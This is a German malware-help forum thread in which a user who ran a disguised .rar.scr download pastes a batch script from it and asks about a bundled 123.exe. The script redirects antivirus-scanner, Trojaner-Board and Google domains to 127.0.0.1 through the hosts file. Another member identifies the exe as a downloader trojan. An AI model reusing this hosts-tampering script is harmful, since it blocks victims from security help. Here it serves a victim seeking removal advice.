Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Brauche jemanden der ne exe datei für mich checken kann plz

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 18.05.2009, 22:02   #1
PepeMasta
 
Brauche jemanden der ne exe datei für mich checken kann plz - Standard

Brauche jemanden der ne exe datei für mich checken kann plz



Hi hab folgendes problem:

wollte mir vorher ein album runterladen, hab aber nicht bemerkt, dass die endung der datei name.rar.scr ist. so draufgeklickt virenmeldung bekommen... klasse was machst jetzt hab ich mal geschaut regedit geht noch taskmanager auch also denk ich mal das es ned so schlimm sein wird. so jetzt hab ich mir meine datei näher angeschaut und bin drauf gekommen das genau zwei dateien drin sind eine antikinder.bat datei die wie folgt lautet:

echo 127.0.0.1 www.virustotal.com >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.virustotal.com >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://virustotal.com >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 virustotal.com >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.scanner.virus.org >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.scanner.virus.org >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://scanner.virus.org >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 scanner.virus.org >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.virusscan.jotti.org/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.virusscan.jotti.org/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://virusscan.jotti.org/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 virusscan.jotti.org/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.trojaner-board.de/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.trojaner-board.de/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://trojaner-board.de/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 trojaner-board.de/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.anubis.iseclab.org/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.anubis.iseclab.org/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://anubis.iseclab.org/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 anubis.iseclab.org/ >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.3dl.am >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.3dl.am >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://3dl.am >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 3dl.am >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.google.de >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.google.de >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://google.de >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 google.de >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.google.com >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.google.com >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://google.com >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 google.com >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.google.at >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.google.at >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://google.at >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 google.at >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.google.ch >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.google.ch >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 http://google.ch >> %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 google.ch >> %systemroot%\system32\drivers\etc\hosts

da hab ich jetzt einfach die hosts datei aus dem ordner gelöscht, weil bei mir google nich mehr ging jetzt funktionierts wieder. jetzt war da noch ne 123.exe mit drin ich würd nur gern wissen ob die einer checken kann was se genau macht und was ich dann alles dagegen tun muss. das wär echt spitze.
ich lad die datei gleich hoch ich werde den link dann auf anfrage schicken möchte hier ja keinen virus oder sonst was verteilen.

danke schon mal
gruß pepe

Alt 18.05.2009, 22:09   #2
space23
Gast
 
Brauche jemanden der ne exe datei für mich checken kann plz - Standard

Brauche jemanden der ne exe datei für mich checken kann plz



Zitat:
wollte mir voher ein album runterladen, hab aber nicht bemerkt, dass die endung der datei name.rar.scr ist. so draufgeklickt virenmeldung bekommen...
Also wenn du dir von irgendeiner illegalen Warez Seite () ein Album runterlädst, wird dir wohl kaum einer helfen sorry!!!

Trotzdem hab ich mal Mitleid und gib dir diesen Link:

http://www.sophos.com/security/analy.../trojvbgx.html

Da siehste was 123.exe ist.

Gruß space
__________________


Alt 18.05.2009, 22:16   #3
space23
Gast
 
Brauche jemanden der ne exe datei für mich checken kann plz - Standard

Brauche jemanden der ne exe datei für mich checken kann plz



Sorry hier nochmal das gleiche in Deutsch:

Troj/VB-GX Trojaner (Trojan.Win32.VB.xt, Download.Trojan, TROJ_VB.DT) - Sophos Sicherheitsanalyse
__________________

Alt 18.05.2009, 22:17   #4
PepeMasta
 
Brauche jemanden der ne exe datei für mich checken kann plz - Standard

Brauche jemanden der ne exe datei für mich checken kann plz



woher weißte das ohne überhaupt die datei gesehen zu haben?

Alt 18.05.2009, 22:18   #5
space23
Gast
 
Brauche jemanden der ne exe datei für mich checken kann plz - Standard

Brauche jemanden der ne exe datei für mich checken kann plz



Zitat:
jetzt war da noch ne 123.exe mit drin ich würd nur gern wissen ob die einer checken kann was se genau macht
Genau das hab ich gemacht.

Zitat:
Troj/VB-GX ist ein Downloader-Trojaner für die Windows-Plattform, der versucht, eine ausführbare Datei mit dem Namen 123.exe von einem vordefinierten remoten Speicherort herunterzuladen.
Gruß space


Alt 18.05.2009, 22:20   #6
PepeMasta
 
Brauche jemanden der ne exe datei für mich checken kann plz - Standard

Brauche jemanden der ne exe datei für mich checken kann plz



ich hab dir die datei doch noch nicht mal geschickt??

jetzt bin ich verwirrt das kann ja sonst was für ne datei sein

Alt 18.05.2009, 22:24   #7
space23
Gast
 
Brauche jemanden der ne exe datei für mich checken kann plz - Standard

Brauche jemanden der ne exe datei für mich checken kann plz



Du hast gefragt jemand soll checken was die macht und auf

Troj/VB-GX Trojaner (Trojan.Win32.VB.xt, Download.Trojan, TROJ_VB.DT) - Sophos Sicherheitsanalyse

wirds dir doch ausführlich erklärt musst halt nur lesen

Gruß space

Antwort

Themen zu Brauche jemanden der ne exe datei für mich checken kann plz
%systemroot%, 127.0.0.1, anfrage, brauche, checken, datei, dateien, einfach, exe, exe datei, folge, folgendes, frage, gelöscht, http://www.google.com, klasse, link, meldung, ordner, problem, regedit, runterladen, schlimm, system32, taskmanager, wissen



Ähnliche Themen: Brauche jemanden der ne exe datei für mich checken kann plz


  1. Doc Datei beschädigt, wichtige für die Uni, wer rettet mich!
    Alles rund um Windows - 28.07.2014 (8)
  2. Avira findet TR/ATRAPS.gen kann die Datei aber nicht löschen. Wie bekomme ich die Datei vom System?
    Plagegeister aller Art und deren Bekämpfung - 25.06.2012 (1)
  3. Kann mal jemand nach Trojanern checken?
    Log-Analyse und Auswertung - 11.10.2010 (1)
  4. Datei checken?
    Alles rund um Windows - 01.04.2009 (8)
  5. Brauche Hilfe beim Checken meines Logfiles
    Log-Analyse und Auswertung - 11.09.2008 (4)
  6. Könnte mir bitte jemanden sagen was ich aus meinem HjT-LogFile löschen kann?
    Mülltonne - 13.09.2007 (0)
  7. eine exe und dll datei bringt mich noch um-hilfe!
    Plagegeister aller Art und deren Bekämpfung - 11.07.2007 (2)
  8. Kann mal bitte wer das Log-File checken?
    Log-Analyse und Auswertung - 27.11.2006 (3)
  9. Kann mal jemand checken?
    Log-Analyse und Auswertung - 08.12.2005 (7)
  10. Kann mal bitte jemand meine HJT checken?
    Log-Analyse und Auswertung - 10.08.2005 (2)
  11. Brauche Hilfe - Bitte mal das Logfile checken
    Log-Analyse und Auswertung - 01.07.2005 (7)
  12. kann jemand mein log checken
    Log-Analyse und Auswertung - 02.06.2005 (0)
  13. Bitte log Datei checken
    Log-Analyse und Auswertung - 13.03.2005 (3)
  14. Kann jemand meine Log-Datei checken? 100%-Auslastung
    Log-Analyse und Auswertung - 28.02.2005 (3)
  15. kann bitte wer meine log - datei checken
    Log-Analyse und Auswertung - 24.01.2005 (2)
  16. Bitte Log-Datei checken!
    Log-Analyse und Auswertung - 19.12.2004 (6)
  17. Cool Web Search - Wer kann mein Log checken?
    Log-Analyse und Auswertung - 11.11.2004 (2)

Zum Thema Brauche jemanden der ne exe datei für mich checken kann plz - Hi hab folgendes problem: wollte mir vorher ein album runterladen, hab aber nicht bemerkt, dass die endung der datei name.rar.scr ist. so draufgeklickt virenmeldung bekommen... klasse was machst jetzt hab - Brauche jemanden der ne exe datei für mich checken kann plz...
Archiv
Du betrachtest: Brauche jemanden der ne exe datei für mich checken kann plz auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.